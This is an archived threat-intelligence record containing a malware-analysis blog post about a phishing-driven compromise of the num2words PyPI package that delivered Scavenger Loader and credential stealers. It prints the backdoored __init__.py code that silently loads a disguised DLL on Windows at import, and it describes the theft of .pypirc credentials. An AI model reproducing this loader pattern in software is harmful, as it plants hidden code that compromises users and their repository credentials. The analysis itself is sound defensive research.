{
	"id": "6bc10ba3-f75b-4093-8e67-de1a4f1c4454",
	"created_at": "2026-04-06T00:12:46.034851Z",
	"updated_at": "2026-04-10T03:21:34.945558Z",
	"deleted_at": null,
	"sha1_hash": "43827f6e63e179d019a0af63b167255322e29bc9",
	"title": "Scavenger Malware Distributed via num2words PyPI Supply Chain Compromise",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 223614,
	"plain_text": "Scavenger Malware Distributed via num2words PyPI Supply\r\nChain Compromise\r\nArchived: 2026-04-05 22:06:11 UTC\r\nOverview\r\nOn Monday July 28th, security researcher @johnk3r tagged the Invoke RE Twitter/X account in a post stating that\r\nthe num2words PyPI package had been compromised and v0.5.15 was exhibiting signs of distributing the\r\nScavenger Malware https://x.com/johnk3r/status/1949862337340461528.\r\nhttps://invokere.com/posts/2025/07/scavenger-malware-distributed-via-num2words-pypi-supply-chain-compromise/\r\nPage 1 of 3\n\nThe user @SFLinux then confirmed that “there was a Phishing attack on PyPI this morning” (likely meaning that\r\nthe package maintainers were Phished) and that the compromised version v0.5.15 had been removed from PyPI.\r\nCedric Brisson provided us with the compromised package that we confirmed contained a Scavenger Loader DLL\r\nthat contains nearly identical functionality to that used in the esling-config-prettier compromise on July 18th.\r\nLater, the project distributed v0.5.16 of the package, however, the code was still backdoored. After back-and-forth with Cedric Brisson the maintainer confirmed that a malicious token was still present within their account\r\nand that the token had been removed to prevent further compromises:\r\nThis blog covers the infection vector used with the compromised num2words PyPI package to execute the\r\nScavenger Loader on infected systems and its follow-on Stealer payloads.\r\nInfection Vector\r\nThe v0.5.15 of num2words contains a small change within the package’s __init__.py file under num2words-0.5.15/__init__.py :\r\nimport os\r\nimport platform\r\nimport sys\r\nimport ctypes\r\ntry:\r\n if platform.system() == \"Windows\":\r\n here = os.path.abspath(os.path.dirname(__file__))\r\n ct = getattr(sys.modules[__name__], \"ctypes\")\r\n help = getattr(ct, \"CDLL\")(os.path.join(here, \"_build.py\"))\r\n getattr(help, \"main\")()\r\nhttps://invokere.com/posts/2025/07/scavenger-malware-distributed-via-num2words-pypi-supply-chain-compromise/\r\nPage 2 of 3\n\nexcept:\r\n print(\"\")\r\nIf this Python code is executed on a Microsoft Windows machine during the package initialization, the\r\n_build.py Microsoft Windows DLL with the build timestamp of 2025-07-28 07:22:19 +00:00 (UTC) will be\r\nloaded and the main export within the DLL will be executed.\r\nScavenger Loader\r\nThe DLL is a Scavenger Loader variant that we detailed in our previous blog, however, uses a new set of\r\ncommand-and-control addresses provided here and a different XXTEA session key N13r4xLz during C2\r\ncommunications. The loader also targets .pypirc files for exfiltration from infected systems. These\r\nconfiguration files often contain repository credentials (likely to perform further compromises). Like the previous\r\nversion analyzed, the C2 provides three separate stealer modules that are available to download from the C2:\r\n[{\"enabled\": true, \"identifier\": \"shiny\", \"drop_name\": \"version.dll\", \"next_to_match\": \"notification_helper.exe\r\nOur analysis of these stealer modules are ongoing, however, Dr. Web has provided a comprehensive overview of\r\neach module here: https://news.drweb.com/show/?i=15036\u0026lng=en\u0026c=5 and the steps the modules take post-compromise.\r\nIndicators of Compromise\r\nAll samples and C2 URLs related to Scavenger Loader and stealer modules can be found here:\r\nhttps://github.com/Invoke-RE/community-malware-research/blob/main/Research/Loaders/Scavenger/num2words_IOCs.md\r\nSpecial Thanks\r\nCedric Brisson for providing us with the compromised package\r\n@johnk3r for bringing this to our attention\r\nSource: https://invokere.com/posts/2025/07/scavenger-malware-distributed-via-num2words-pypi-supply-chain-compromise/\r\nhttps://invokere.com/posts/2025/07/scavenger-malware-distributed-via-num2words-pypi-supply-chain-compromise/\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://invokere.com/posts/2025/07/scavenger-malware-distributed-via-num2words-pypi-supply-chain-compromise/"
	],
	"report_names": [
		"scavenger-malware-distributed-via-num2words-pypi-supply-chain-compromise"
	],
	"threat_actors": [],
	"ts_created_at": 1775434366,
	"ts_updated_at": 1775791294,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/43827f6e63e179d019a0af63b167255322e29bc9.pdf",
		"text": "https://archive.orkl.eu/43827f6e63e179d019a0af63b167255322e29bc9.txt",
		"img": "https://archive.orkl.eu/43827f6e63e179d019a0af63b167255322e29bc9.jpg"
	}
}